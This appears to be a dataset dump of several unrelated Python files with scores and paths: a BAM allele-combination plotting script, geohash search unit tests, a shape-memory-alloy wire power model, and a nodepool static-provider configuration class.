if len(args.bams) == 1:
print >> sys.stderr, "ERROR: please specify more than 1 BAM"
sys.exit()
# setting up the figure object
sns.set_style('ticks')
f, axarr = plt.subplots(len(args.bams), 1, figsize=(8,10))
pal = sns.color_palette('Blues', len(args.bams))
refseq = get_refseq(args.ref)
for i,bam in enumerate(args.bams):
name = bam.split('/')[-1].split('.')[0].upper()
arrays = extract_arrays(bam, refseq, copy_filter='hard').arrays
af = extract_arrays(bam, refseq, copy_filter='hard').af
# limit analysis to arrays of the specified copy number
filtered_arrays = [tuple(a) for a in arrays if len(a) == args.cn]
# determine all possible combinations of alleles in a array of `cn` copy
# number using cartesian products
cart_prods = [''.join([str(x) for x in g]) for g in product([0,1], repeat=args.cn)]
cart_prods = sorted(cart_prods, key=lambda x: x.count('1'))
# count every instance of these combinations in the sequenced data
all_combos = get_counts(filtered_arrays, cart_prods, cn=args.cn)
# count every array of the specified copy number
total_cn_arrays = float(sum(all_combos.values()))
# count the total number of arrays with mixed alleles
total_mixed = float(sum(all_combos.values()[1:-1]))
frac_mixed = total_mixed / total_cn_arrays
x = range(len(cart_prods))
# get the fraction of each allele combination in the sequence data
y = [_ / total_cn_arrays for _ in all_combos.values()]
axarr[i].plot(x, y, color=pal[i], marker='o', label='observed')
axarr[i].text((len(x) - 1) / 4., (np.max(y) - np.min(y)) / 2. + 0.05,
'Mixed array fraction {}'.format(round(sum(y[1:-1]), 2)))
axarr[i].axvline(1, color='r', ls=':')
axarr[i].axvline(len(x) - 2, color='r', ls=':')
axarr[i].tick_params(axis='y', labelsize=12.5, color='k')
axarr[i].tick_params(axis='x', labelsize=12.5, color='k')
axarr[i].spines['left'].set_color('k')
axarr[i].spines['bottom'].set_color('k')
axarr[i].legend()
# figure/axis formatting
if i == len(args.bams) - 1:
axarr[i].set_xticks(x)
axarr[i].set_xticklabels(['-'.join(list(c)) for c in cart_prods])
axarr[i].set_xlabel('Allele combination (0 = $K3L^{WT}$, 1 = $K3L^{His47Arg}$)')
else:
axarr[i].get_xaxis().set_visible(False)
axarr[i].set_title(name)
for tick in axarr[i].get_xticklabels():
tick.set_rotation(45)
if i == 1:
axarr[i].set_ylabel("Proportion of arrays")
sns.despine(ax=axarr[i], trim=True)
if args.png:
plt.savefig(args.o + '.png', format='png', bbox_inches='tight')
else:
plt.savefig(args.o + '.eps', format='eps', bbox_inches='tight')
def main(argv):
import argparse
p = argparse.ArgumentParser()
p.add_argument("--bams", required = True, help='Path to sorted BAM files.', nargs='*')
p.add_argument("--ref", required = True, help='Path to FASTA reference genome.')
p.add_argument("-cn", type=int, default=3, help='Plot arrays with this many copies of K3L. (default = 3)')
p.add_argument("-o", help='Name of output plot.', default='array-combinations')
p.add_argument('-png', help='Output as png.', action='store_true')
run(p.parse_args(argv))
if __name__ == "__main__":
import sys
main(sys.argv[1:]) | 0.320928 | 0.456289 |
import unittest
from app.main.searcher import Search
from app.main.loc_types import Point, PointWithDistance
class TestSearcher(unittest.TestCase):
def test_on_empty_list_circle(self):
self.assertEqual(Search.search_points(Point("", 46.483264729155586, 30.731506347656254), 3, []), [])
def test_with_radius_increase_circle(self):
points = [Point("1.00", 49.86875093132386, -126.63013458251955),
Point("1.04", 49.86460165007597, -126.61710977554323),
Point("2.04", 49.86512724541457, -126.61693811416627),
Point("3.26", 49.86431118704076, -126.61401987075807),
Point("4.22", 49.8661784189361, -126.61363363265993),
Point("5.45", 49.86283118159863, -126.6121530532837),
Point("6.37", 49.86399305885544, -126.61258220672609),
Point("7.205", 49.857823724196905, -126.60713195800783)]
self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 0, points)), 1)
self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 1100, points)), 3)
self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 1300, points)), 5)
self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 1400, points)), 6)
self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 1500, points)), 7)
self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 2100, points)), 8)
def test_in_or_not_in_circle(self):
res = Search.search_points(Point("", 17.43215425542, 63.3124235462342), 1000,
[Point("1", 17.42565123123, 63.325814352343),
Point("2", 17.42565123123, 63.325814352343)])
self.assertEqual(res, [])
def test_with_distance_circle(self):
points_list = [Point("1.04", 49.98460165007597, -126.61710977554323),
Point("2.04", 49.97512724541457, -126.61693811416627),
Point("3.26", 49.96431118704076, -126.61401987075807),
Point("4.22", 49.9061784189361, -126.61363363265993),
Point("5.45", 49.86383118159863, -126.6121530532837),
Point("6.37", 49.86499305885544, -126.61258220672609),
Point("7.205", 49.857823724196905, -126.60713195800783)]
res = Search.search_points(Point("", 49.86431118704076, -126.6171530532837), 5000, points_list)
expected_list = [PointWithDistance(points_list[5], 336),
PointWithDistance(points_list[4], 362),
PointWithDistance(points_list[6], 1018),
PointWithDistance(points_list[3], 4662)]
self.assertEqual(res, expected_list)
def test_general_prefix_circle(self):
point = Point("test_id", 19.97512724541457, 24.61693811416627)
self.assertTrue(Search.general_prefix(Point("", 19.97512724541457, 24.61693811416627), 800) in point.geohash)
self.assertEqual(Search.general_prefix(Point("", 49.98460165007597, -126.61710977554323), 500), "c0vuq")
self.assertEqual(Search.general_prefix(Point("", 49.97512724541457, -126.61693811416627), 800), "c0vu")
self.assertEqual(Search.general_prefix(Point("", 49.97512724541457, -126.61693811416627), 4000), "c0")
self.assertEqual(Search.general_prefix(Point("", 49.97512724541457, -126.61693811416627), 90000), "c")
self.assertEqual(Search.general_prefix(Point("", 32.97512724541457, -57.61693811416627), 1000), "dtz5")
self.assertEqual(Search.general_prefix(Point("", 46.97512724541457, 47.61693811416627), 5000), "v03")
self.assertEqual(Search.general_prefix(Point("", 46.97512724541457, 63.61693811416627), 3000), "v2m")
def test_general_prefix_rectangle(self):
actual = Search.general_prefix_rectangle([Point("top_left", 59.72386952131737, -113.01773071289062),
Point("bot_right", 59.68386129364914, -112.92572021484375)])
self.assertEqual("c6xe", actual)
actual = Search.general_prefix_rectangle([Point("top_left", 59.839295488500326, -112.89825439453125),
Point("bot_right", 59.78577919120723, -112.79525756835938)])
self.assertEqual("c6x", actual)
actual = Search.general_prefix_rectangle([Point("top_left", 60.2035192283986, -112.91772723197937),
Point("bot_right", 60.20343925759669, -112.91756093502045)])
self.assertEqual("c6xwqrxy", actual)
actual = Search.general_prefix_rectangle([Point("top_left", 60.13586367528046, -112.8738784790039),
Point("bot_right", 60.13458148138504, -112.87078857421875)])
self.assertEqual("c6xwp", actual)
def test_search_in_rectangle(self):
points = [Point("in_rect1", 59.708114412194135, -112.99713134765625),
Point("in_rect2", 59.692871645401674, -112.99198150634766),
Point("in_rect3", 59.697029451864545, -112.9669189453125),
Point("in_rect4", 59.71313607653958, -112.97309875488281),
Point("in_rect5", 59.72213855345352, -113.00537109375),
Point("not_in_rect1", 59.7363298459524, -112.95249938964844),
Point("not_in_rect2", 59.6673938144924, -112.97138214111328),
Point("not_in_rect3", 59.70361158972945, -112.88108825683594),
Point("not_in_rect4", 59.7037847864095, -113.05103302001953),
Point("not_in_rect5", 59.72767733532802, -113.01155090332031)]
actual = len(Search.search_points_rectangle([Point("top_left", 59.72386952131737, -113.01773071289062),
Point("bot_right", 59.68386129364914, -112.92572021484375)],
Point("cur_p", 59.70222598402985, -112.9562759399414), points))
self.assertEqual(5, actual)
def test_with_distance_rectangle(self):
points = [Point("in_rect1", 59.708114412194135, -112.99713134765625),
Point("in_rect2", 59.692871645401674, -112.99198150634766),
Point("in_rect3", 59.697029451864545, -112.9669189453125),
Point("in_rect4", 59.71313607653958, -112.97309875488281),
Point("in_rect5", 59.72213855345352, -113.00537109375),
Point("not_in_rect1", 59.7363298459524, -112.95249938964844),
Point("not_in_rect2", 59.6673938144924, -112.97138214111328),
Point("not_in_rect3", 59.70361158972945, -112.88108825683594),
Point("not_in_rect4", 59.7037847864095, -113.05103302001953),
Point("not_in_rect5", 59.72767733532802, -113.01155090332031)]
actual = Search.search_points_rectangle([Point("top_left", 59.72386952131737, -113.01773071289062),
Point("bot_right", 59.68386129364914, -112.92572021484375)],
Point("cur_p", 59.70222598402985, -112.9562759399414), points)
expected_list = [PointWithDistance(points[2], 830),
PointWithDistance(points[3], 1536),
PointWithDistance(points[1], 2257),
PointWithDistance(points[0], 2383),
PointWithDistance(points[4], 3533)]
self.assertEqual(expected_list, actual)
if __name__ == '__main__':
unittest.main() | app/test/test_searcher.py | import unittest
from app.main.searcher import Search
from app.main.loc_types import Point, PointWithDistance
class TestSearcher(unittest.TestCase):
def test_on_empty_list_circle(self):
self.assertEqual(Search.search_points(Point("", 46.483264729155586, 30.731506347656254), 3, []), [])
def test_with_radius_increase_circle(self):
points = [Point("1.00", 49.86875093132386, -126.63013458251955),
Point("1.04", 49.86460165007597, -126.61710977554323),
Point("2.04", 49.86512724541457, -126.61693811416627),
Point("3.26", 49.86431118704076, -126.61401987075807),
Point("4.22", 49.8661784189361, -126.61363363265993),
Point("5.45", 49.86283118159863, -126.6121530532837),
Point("6.37", 49.86399305885544, -126.61258220672609),
Point("7.205", 49.857823724196905, -126.60713195800783)]
self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 0, points)), 1)
self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 1100, points)), 3)
self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 1300, points)), 5)
self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 1400, points)), 6)
self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 1500, points)), 7)
self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 2100, points)), 8)
def test_in_or_not_in_circle(self):
res = Search.search_points(Point("", 17.43215425542, 63.3124235462342), 1000,
[Point("1", 17.42565123123, 63.325814352343),
Point("2", 17.42565123123, 63.325814352343)])
self.assertEqual(res, [])
def test_with_distance_circle(self):
points_list = [Point("1.04", 49.98460165007597, -126.61710977554323),
Point("2.04", 49.97512724541457, -126.61693811416627),
Point("3.26", 49.96431118704076, -126.61401987075807),
Point("4.22", 49.9061784189361, -126.61363363265993),
Point("5.45", 49.86383118159863, -126.6121530532837),
Point("6.37", 49.86499305885544, -126.61258220672609),
Point("7.205", 49.857823724196905, -126.60713195800783)]
res = Search.search_points(Point("", 49.86431118704076, -126.6171530532837), 5000, points_list)
expected_list = [PointWithDistance(points_list[5], 336),
PointWithDistance(points_list[4], 362),
PointWithDistance(points_list[6], 1018),
PointWithDistance(points_list[3], 4662)]
self.assertEqual(res, expected_list)
def test_general_prefix_circle(self):
point = Point("test_id", 19.97512724541457, 24.61693811416627)
self.assertTrue(Search.general_prefix(Point("", 19.97512724541457, 24.61693811416627), 800) in point.geohash)
self.assertEqual(Search.general_prefix(Point("", 49.98460165007597, -126.61710977554323), 500), "c0vuq")
self.assertEqual(Search.general_prefix(Point("", 49.97512724541457, -126.61693811416627), 800), "c0vu")
self.assertEqual(Search.general_prefix(Point("", 49.97512724541457, -126.61693811416627), 4000), "c0")
self.assertEqual(Search.general_prefix(Point("", 49.97512724541457, -126.61693811416627), 90000), "c")
self.assertEqual(Search.general_prefix(Point("", 32.97512724541457, -57.61693811416627), 1000), "dtz5")
self.assertEqual(Search.general_prefix(Point("", 46.97512724541457, 47.61693811416627), 5000), "v03")
self.assertEqual(Search.general_prefix(Point("", 46.97512724541457, 63.61693811416627), 3000), "v2m")
def test_general_prefix_rectangle(self):
actual = Search.general_prefix_rectangle([Point("top_left", 59.72386952131737, -113.01773071289062),
Point("bot_right", 59.68386129364914, -112.92572021484375)])
self.assertEqual("c6xe", actual)
actual = Search.general_prefix_rectangle([Point("top_left", 59.839295488500326, -112.89825439453125),
Point("bot_right", 59.78577919120723, -112.79525756835938)])
self.assertEqual("c6x", actual)
actual = Search.general_prefix_rectangle([Point("top_left", 60.2035192283986, -112.91772723197937),
Point("bot_right", 60.20343925759669, -112.91756093502045)])
self.assertEqual("c6xwqrxy", actual)
actual = Search.general_prefix_rectangle([Point("top_left", 60.13586367528046, -112.8738784790039),
Point("bot_right", 60.13458148138504, -112.87078857421875)])
self.assertEqual("c6xwp", actual)
def test_search_in_rectangle(self):
points = [Point("in_rect1", 59.708114412194135, -112.99713134765625),
Point("in_rect2", 59.692871645401674, -112.99198150634766),
Point("in_rect3", 59.697029451864545, -112.9669189453125),
Point("in_rect4", 59.71313607653958, -112.97309875488281),
Point("in_rect5", 59.72213855345352, -113.00537109375),
Point("not_in_rect1", 59.7363298459524, -112.95249938964844),
Point("not_in_rect2", 59.6673938144924, -112.97138214111328),
Point("not_in_rect3", 59.70361158972945, -112.88108825683594),
Point("not_in_rect4", 59.7037847864095, -113.05103302001953),
Point("not_in_rect5", 59.72767733532802, -113.01155090332031)]
actual = len(Search.search_points_rectangle([Point("top_left", 59.72386952131737, -113.01773071289062),
Point("bot_right", 59.68386129364914, -112.92572021484375)],
Point("cur_p", 59.70222598402985, -112.9562759399414), points))
self.assertEqual(5, actual)
def test_with_distance_rectangle(self):
points = [Point("in_rect1", 59.708114412194135, -112.99713134765625),
Point("in_rect2", 59.692871645401674, -112.99198150634766),
Point("in_rect3", 59.697029451864545, -112.9669189453125),
Point("in_rect4", 59.71313607653958, -112.97309875488281),
Point("in_rect5", 59.72213855345352, -113.00537109375),
Point("not_in_rect1", 59.7363298459524, -112.95249938964844),
Point("not_in_rect2", 59.6673938144924, -112.97138214111328),
Point("not_in_rect3", 59.70361158972945, -112.88108825683594),
Point("not_in_rect4", 59.7037847864095, -113.05103302001953),
Point("not_in_rect5", 59.72767733532802, -113.01155090332031)]
actual = Search.search_points_rectangle([Point("top_left", 59.72386952131737, -113.01773071289062),
Point("bot_right", 59.68386129364914, -112.92572021484375)],
Point("cur_p", 59.70222598402985, -112.9562759399414), points)
expected_list = [PointWithDistance(points[2], 830),
PointWithDistance(points[3], 1536),
PointWithDistance(points[1], 2257),
PointWithDistance(points[0], 2383),
PointWithDistance(points[4], 3533)]
self.assertEqual(expected_list, actual)
if __name__ == '__main__':
unittest.main() | 0.566858 | 0.479869 |
import math
import numpy as np
import matplotlib.pyplot as plt
def power(delta_t, sigma, T, xi, eps_s, L_s, output = "all"):
"""
Calculate work, power and current.
- output: defines what is the function output (Power or all)
"""
sigma_o = 100e6
r = 0.00025
d = 2*r
T_o = 200.
alpha = 0. #set to zero on purpose
c = 837.36 #invented
rho = 6450.
#Transformation strain properties
H_max = 0.1209
H_min = 0.0924
sigma_crit = 0
k = 5.9713e-09
rho_E_M = 0.8e-6 #Dynalloy
rho_E_A = 1.0e-6 #Dynalloy
E_A = 2.1496e+10
E_M = 3.3453e+10
C_A = 8.0370e+06
C_M = 7.1233e+06
M_s = 362.5851
M_f = 297.4771
A_s = 318.3625
A_f = 386.8458
n1 = 0.1919
n2 = 0.1823
n3 = 0.1623
n4 = 0.2188
sigma_cal = 200E6
#==============================================================================
# # Heat Transfer parameters
#==============================================================================
# Gravity:
g = 9.8 #ms-2
# Atmospheric pressure
P_air = 101325. # Pa
# Molar
M = 0.0289644 #kg/mol
# Ideal gas constant
R = 8.31447 #J/(mol K)
# Air density:
rho_air = P_air*M / (R*T_o)
# Sutherland's law coefficients
C1 = 1.458e-6 #kg/m.s.sqrt(K)
C2 = 110.4 #K
# Air dynamic viscosity:
mu_air = (C1 * T_o**(3./2)) / (T_o+C2)
# Air kinematic viscosity:
nu_air = mu_air/rho_air
# Air specific heat at constant pressure
Cp_air = 1.005
# Air conductivity
k_air = 0.0264
# Nusselt number coefficients
alpha_1 = 1.
alpha_2 = 0.287
#==============================================================================
# Calculate Power and current
#==============================================================================
I_list = []
P_list = []
W_list = []
n = len(eps_s)
for i in range(1, n):
delta_sigma = sigma[i] - sigma[i-1]
delta_T = T[i] - T[i-1]
delta_eps = eps_s[i] - eps_s[i-1]
delta_xi = xi[i] - xi[i-1]
# Grashof number for external flow around a cylinder
Gr = 2*abs(T[i] - T_o)/(T[i] + T_o)*(g*d**3)/(nu_air**2)
# Prandtl number definition
Pr = mu_air*Cp_air/k_air
# Nusselt number and parameter
Nu = (alpha_1 + alpha_2*(Gr*Pr/(1 + (0.56/Pr)**(9./16))**(16./9))**(1./6))**2
# Calculate convection coefficient h from definition of Nusselt number
h = k_air*Nu/d
rho_E = rho_E_M*xi[i] + (1-xi[i])*rho_E_A
if abs(sigma[i]) <= sigma_crit:
dH_cur = 0
else:
dH_cur = k*(H_max-H_min)*math.exp(-k*(abs(sigma[i])-sigma_crit))*np.sign(sigma[i])
H_cur = H_min + (H_max - H_min)*(1. - math.exp(-k*(abs(sigma_o) - sigma_crit)))
H_cur_cal = H_min + (H_max - H_min)*(1. - math.exp(-k*(abs(sigma_cal) - sigma_crit)))
rho_delta_s0 = (-2*(C_M*C_A)*(H_cur_cal + sigma_cal*dH_cur + sigma_cal*(1/E_M - 1/E_A)))/(C_M + C_A)
a1 = rho_delta_s0*(M_f - M_s)
a2 = rho_delta_s0*(A_s - A_f)
a3 = -a1/4 * (1 + 1/(n1+1) - 1/(n2+1)) + a2/4 * (1+1/(n3+1) - 1/(n4+1))
Y_0_t = rho_delta_s0/2*(M_s - A_f) - a3
D = ((C_M - C_A)*(H_cur_cal + sigma_cal*dH_cur + sigma_cal*(1/E_M - 1/E_A)))/((C_M + C_A)*(H_cur_cal+ sigma_cal*dH_cur))
pi_t = Y_0_t + D*abs(sigma[i])*H_cur
#constant h
I = r*math.pi*math.sqrt((r/rho_E)*((r/delta_t)*((T[i]*alpha*delta_sigma + \
rho*c*delta_T + delta_xi*(-pi_t + rho_delta_s0*T[i]) ) + \
2.*h*(T[i] - T_o))))
P = math.pi*r**2*L_s[i]*((T[i]*alpha*delta_sigma + \
rho*c*delta_T + delta_xi*(-pi_t + rho_delta_s0*T[i]) )/delta_t + \
2.*(h/r)*(T[i] - T_o))
dW = math.pi*r**2*L_s[0]*0.5*(sigma[i]+sigma[i-1])*delta_eps
I_list.append(I)
P_list.append(P)
W_list.append(dW)
Total_power = 0
for i in range(len(P_list)-1):
Total_power += delta_t*(P_list[i] + P_list[i+1])/2.
if output == 'all':
return I_list, P_list, W_list, Total_power
elif output == "power":
return Total_power
if __name__ == '__main__':
import pickle
#Load data
Data = pickle.load(open( "data.p", "rb" ))
sigma = Data['sigma']
T = Data['T']
xi = Data['xi']
eps_s = Data['eps_s']
L_s = Data['L_s']
#Time step
delta_t = 0.05
I, P, W, Total_power = power(delta_t, sigma, T, xi, eps_s, L_s, output = "all")
n = len(eps_s)
t = np.linspace(0,(n-2)*delta_t, n-1)
plt.figure()
plt.plot(t, I, 'b')
plt.scatter(t, I, c = 'b')
plt.xlabel('Time (s)')
plt.ylabel('Current (A)')
plt.axis([min(t) - 0.02*(max(t)-min(t)), max(t)+ 0.02*(max(t)-min(t)),
min(I) - 0.02*(max(I)-min(I)),
max(I) + 0.02*(max(I)-min(I))])
plt.grid()
plt.figure()
plt.plot(t, P, 'b')
plt.scatter(t, P, c = 'b')
plt.xlabel('Time (s)')
plt.ylabel('Power (W)')
plt.axis([min(t) - 0.02*(max(t)-min(t)), max(t)+ 0.02*(max(t)-min(t)),
min(P) - 0.02*(max(P)-min(P)),
max(P) + 0.02*(max(P)-min(P))])
plt.grid()
print 'Total power is %f Joules' % Total_power | dynamic_model/power_usage.py | import math
import numpy as np
import matplotlib.pyplot as plt
def power(delta_t, sigma, T, xi, eps_s, L_s, output = "all"):
"""
Calculate work, power and current.
- output: defines what is the function output (Power or all)
"""
sigma_o = 100e6
r = 0.00025
d = 2*r
T_o = 200.
alpha = 0. #set to zero on purpose
c = 837.36 #invented
rho = 6450.
#Transformation strain properties
H_max = 0.1209
H_min = 0.0924
sigma_crit = 0
k = 5.9713e-09
rho_E_M = 0.8e-6 #Dynalloy
rho_E_A = 1.0e-6 #Dynalloy
E_A = 2.1496e+10
E_M = 3.3453e+10
C_A = 8.0370e+06
C_M = 7.1233e+06
M_s = 362.5851
M_f = 297.4771
A_s = 318.3625
A_f = 386.8458
n1 = 0.1919
n2 = 0.1823
n3 = 0.1623
n4 = 0.2188
sigma_cal = 200E6
#==============================================================================
# # Heat Transfer parameters
#==============================================================================
# Gravity:
g = 9.8 #ms-2
# Atmospheric pressure
P_air = 101325. # Pa
# Molar
M = 0.0289644 #kg/mol
# Ideal gas constant
R = 8.31447 #J/(mol K)
# Air density:
rho_air = P_air*M / (R*T_o)
# Sutherland's law coefficients
C1 = 1.458e-6 #kg/m.s.sqrt(K)
C2 = 110.4 #K
# Air dynamic viscosity:
mu_air = (C1 * T_o**(3./2)) / (T_o+C2)
# Air kinematic viscosity:
nu_air = mu_air/rho_air
# Air specific heat at constant pressure
Cp_air = 1.005
# Air conductivity
k_air = 0.0264
# Nusselt number coefficients
alpha_1 = 1.
alpha_2 = 0.287
#==============================================================================
# Calculate Power and current
#==============================================================================
I_list = []
P_list = []
W_list = []
n = len(eps_s)
for i in range(1, n):
delta_sigma = sigma[i] - sigma[i-1]
delta_T = T[i] - T[i-1]
delta_eps = eps_s[i] - eps_s[i-1]
delta_xi = xi[i] - xi[i-1]
# Grashof number for external flow around a cylinder
Gr = 2*abs(T[i] - T_o)/(T[i] + T_o)*(g*d**3)/(nu_air**2)
# Prandtl number definition
Pr = mu_air*Cp_air/k_air
# Nusselt number and parameter
Nu = (alpha_1 + alpha_2*(Gr*Pr/(1 + (0.56/Pr)**(9./16))**(16./9))**(1./6))**2
# Calculate convection coefficient h from definition of Nusselt number
h = k_air*Nu/d
rho_E = rho_E_M*xi[i] + (1-xi[i])*rho_E_A
if abs(sigma[i]) <= sigma_crit:
dH_cur = 0
else:
dH_cur = k*(H_max-H_min)*math.exp(-k*(abs(sigma[i])-sigma_crit))*np.sign(sigma[i])
H_cur = H_min + (H_max - H_min)*(1. - math.exp(-k*(abs(sigma_o) - sigma_crit)))
H_cur_cal = H_min + (H_max - H_min)*(1. - math.exp(-k*(abs(sigma_cal) - sigma_crit)))
rho_delta_s0 = (-2*(C_M*C_A)*(H_cur_cal + sigma_cal*dH_cur + sigma_cal*(1/E_M - 1/E_A)))/(C_M + C_A)
a1 = rho_delta_s0*(M_f - M_s)
a2 = rho_delta_s0*(A_s - A_f)
a3 = -a1/4 * (1 + 1/(n1+1) - 1/(n2+1)) + a2/4 * (1+1/(n3+1) - 1/(n4+1))
Y_0_t = rho_delta_s0/2*(M_s - A_f) - a3
D = ((C_M - C_A)*(H_cur_cal + sigma_cal*dH_cur + sigma_cal*(1/E_M - 1/E_A)))/((C_M + C_A)*(H_cur_cal+ sigma_cal*dH_cur))
pi_t = Y_0_t + D*abs(sigma[i])*H_cur
#constant h
I = r*math.pi*math.sqrt((r/rho_E)*((r/delta_t)*((T[i]*alpha*delta_sigma + \
rho*c*delta_T + delta_xi*(-pi_t + rho_delta_s0*T[i]) ) + \
2.*h*(T[i] - T_o))))
P = math.pi*r**2*L_s[i]*((T[i]*alpha*delta_sigma + \
rho*c*delta_T + delta_xi*(-pi_t + rho_delta_s0*T[i]) )/delta_t + \
2.*(h/r)*(T[i] - T_o))
dW = math.pi*r**2*L_s[0]*0.5*(sigma[i]+sigma[i-1])*delta_eps
I_list.append(I)
P_list.append(P)
W_list.append(dW)
Total_power = 0
for i in range(len(P_list)-1):
Total_power += delta_t*(P_list[i] + P_list[i+1])/2.
if output == 'all':
return I_list, P_list, W_list, Total_power
elif output == "power":
return Total_power
if __name__ == '__main__':
import pickle
#Load data
Data = pickle.load(open( "data.p", "rb" ))
sigma = Data['sigma']
T = Data['T']
xi = Data['xi']
eps_s = Data['eps_s']
L_s = Data['L_s']
#Time step
delta_t = 0.05
I, P, W, Total_power = power(delta_t, sigma, T, xi, eps_s, L_s, output = "all")
n = len(eps_s)
t = np.linspace(0,(n-2)*delta_t, n-1)
plt.figure()
plt.plot(t, I, 'b')
plt.scatter(t, I, c = 'b')
plt.xlabel('Time (s)')
plt.ylabel('Current (A)')
plt.axis([min(t) - 0.02*(max(t)-min(t)), max(t)+ 0.02*(max(t)-min(t)),
min(I) - 0.02*(max(I)-min(I)),
max(I) + 0.02*(max(I)-min(I))])
plt.grid()
plt.figure()
plt.plot(t, P, 'b')
plt.scatter(t, P, c = 'b')
plt.xlabel('Time (s)')
plt.ylabel('Power (W)')
plt.axis([min(t) - 0.02*(max(t)-min(t)), max(t)+ 0.02*(max(t)-min(t)),
min(P) - 0.02*(max(P)-min(P)),
max(P) + 0.02*(max(P)-min(P))])
plt.grid()
print 'Total power is %f Joules' % Total_power | 0.439386 | 0.524456 |
import voluptuous as v
from nodepool.driver import ConfigPool
from nodepool.driver import ProviderConfig
from nodepool.config import as_list
class StaticPool(ConfigPool):
def __init__(self):
self.name = None
self.nodes = []
# The StaticProviderConfig that owns this pool.
self.provider = None
# Initialize base class attributes
super().__init__()
def __eq__(self, other):
if isinstance(other, StaticPool):
return (super().__eq__(other) and
other.name == self.name and
other.nodes == self.nodes)
return False
def __repr__(self):
return "<StaticPool %s>" % self.name
def load(self, pool_config, full_config):
super().load(pool_config)
self.name = pool_config['name']
# WARNING: This intentionally changes the type!
self.labels = set()
for node in pool_config.get('nodes', []):
self.nodes.append({
'name': node['name'],
'labels': as_list(node['labels']),
'host-key': as_list(node.get('host-key', [])),
'host-key-checking': bool(node.get('host-key-checking', True)),
'timeout': int(node.get('timeout', 5)),
# Read ssh-port values for backward compat, but prefer port
'connection-port': int(
node.get('connection-port', node.get('ssh-port', 22))),
'connection-type': node.get('connection-type', 'ssh'),
'username': node.get('username', 'zuul'),
'max-parallel-jobs': int(node.get('max-parallel-jobs', 1)),
'python-path': node.get('python-path', '/usr/bin/python2'),
})
if isinstance(node['labels'], str):
for label in node['labels'].split():
self.labels.add(label)
full_config.labels[label].pools.append(self)
elif isinstance(node['labels'], list):
for label in node['labels']:
self.labels.add(label)
full_config.labels[label].pools.append(self)
class StaticProviderConfig(ProviderConfig):
def __init__(self, *args, **kwargs):
self.__pools = {}
super().__init__(*args, **kwargs)
def __eq__(self, other):
if isinstance(other, StaticProviderConfig):
return (super().__eq__(other) and
other.manage_images == self.manage_images and
other.pools == self.pools)
return False
@property
def pools(self):
return self.__pools
@property
def manage_images(self):
return False
def load(self, config):
for pool in self.provider.get('pools', []):
pp = StaticPool()
pp.load(pool, config)
pp.provider = self
self.pools[pp.name] = pp
def getSchema(self):
pool_node = {
v.Required('name'): str,
v.Required('labels'): v.Any(str, [str]),
'username': str,
'timeout': int,
'host-key-checking': bool,
'host-key': v.Any(str, [str]),
'connection-port': int,
'connection-type': str,
'max-parallel-jobs': int,
'python-path': str,
}
pool = ConfigPool.getCommonSchemaDict()
pool.update({
'name': str,
'nodes': [pool_node],
})
schema = ProviderConfig.getCommonSchemaDict()
schema.update({'pools': [pool]})
return v.Schema(schema)
def getSupportedLabels(self, pool_name=None):
labels = set()
for pool in self.pools.values():
if not pool_name or (pool.name == pool_name):
labels.update(pool.labels)
return labels | nodepool/driver/static/config.py |
import voluptuous as v
from nodepool.driver import ConfigPool
from nodepool.driver import ProviderConfig
from nodepool.config import as_list
class StaticPool(ConfigPool):
def __init__(self):
self.name = None
self.nodes = []
# The StaticProviderConfig that owns this pool.
self.provider = None
# Initialize base class attributes
super().__init__()
def __eq__(self, other):
if isinstance(other, StaticPool):
return (super().__eq__(other) and
other.name == self.name and
other.nodes == self.nodes)
return False
def __repr__(self):
return "<StaticPool %s>" % self.name
def load(self, pool_config, full_config):
super().load(pool_config)
self.name = pool_config['name']
# WARNING: This intentionally changes the type!
self.labels = set()
for node in pool_config.get('nodes', []):
self.nodes.append({
'name': node['name'],
'labels': as_list(node['labels']),
'host-key': as_list(node.get('host-key', [])),
'host-key-checking': bool(node.get('host-key-checking', True)),
'timeout': int(node.get('timeout', 5)),
# Read ssh-port values for backward compat, but prefer port
'connection-port': int(
node.get('connection-port', node.get('ssh-port', 22))),
'connection-type': node.get('connection-type', 'ssh'),
'username': node.get('username', 'zuul'),
'max-parallel-jobs': int(node.get('max-parallel-jobs', 1)),
'python-path': node.get('python-path', '/usr/bin/python2'),
})
if isinstance(node['labels'], str):
for label in node['labels'].split():
self.labels.add(label)
full_config.labels[label].pools.append(self)
elif isinstance(node['labels'], list):
for label in node['labels']:
self.labels.add(label)
full_config.labels[label].pools.append(self)
class StaticProviderConfig(ProviderConfig):
def __init__(self, *args, **kwargs):
self.__pools = {}
super().__init__(*args, **kwargs)
def __eq__(self, other):
if isinstance(other, StaticProviderConfig):
return (super().__eq__(other) and
other.manage_images == self.manage_images and
other.pools == self.pools)
return False
@property
def pools(self):
return self.__pools
@property
def manage_images(self):
return False
def load(self, config):
for pool in self.provider.get('pools', []):
pp = StaticPool()
pp.load(pool, config)
pp.provider = self
self.pools[pp.name] = pp
def getSchema(self):
pool_node = {
v.Required('name'): str,
v.Required('labels'): v.Any(str, [str]),
'username': str,
'timeout': int,
'host-key-checking': bool,
'host-key': v.Any(str, [str]),
'connection-port': int,
'connection-type': str,
'max-parallel-jobs': int,
'python-path': str,
}
pool = ConfigPool.getCommonSchemaDict()
pool.update({
'name': str,
'nodes': [pool_node],
})
schema = ProviderConfig.getCommonSchemaDict()
schema.update({'pools': [pool]})
return v.Schema(schema)
def getSupportedLabels(self, pool_name=None):
labels = set()
for pool in self.pools.values():
if not pool_name or (pool.name == pool_name):
labels.update(pool.labels)
return labels | 0.667798 | 0.113924 |
import os
import glob
from datetime import datetime,date
import random
import itertools
import pickle
import time
import requests
from bs4 import BeautifulSoup
import re
import nltk
from nltk.corpus import names
from nltk.tokenize import RegexpTokenizer
